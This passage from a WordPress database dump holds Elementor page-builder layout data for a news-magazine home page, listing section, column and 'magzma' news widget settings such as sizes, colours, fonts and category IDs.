nd\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#04f7a2\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_typography\":\"custom\",\"typography_font_family\":\"Tahoma\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"2\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1311,461,'_elementor_version','0.4'),(1313,462,'_elementor_edit_mode','builder'),(1314,462,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_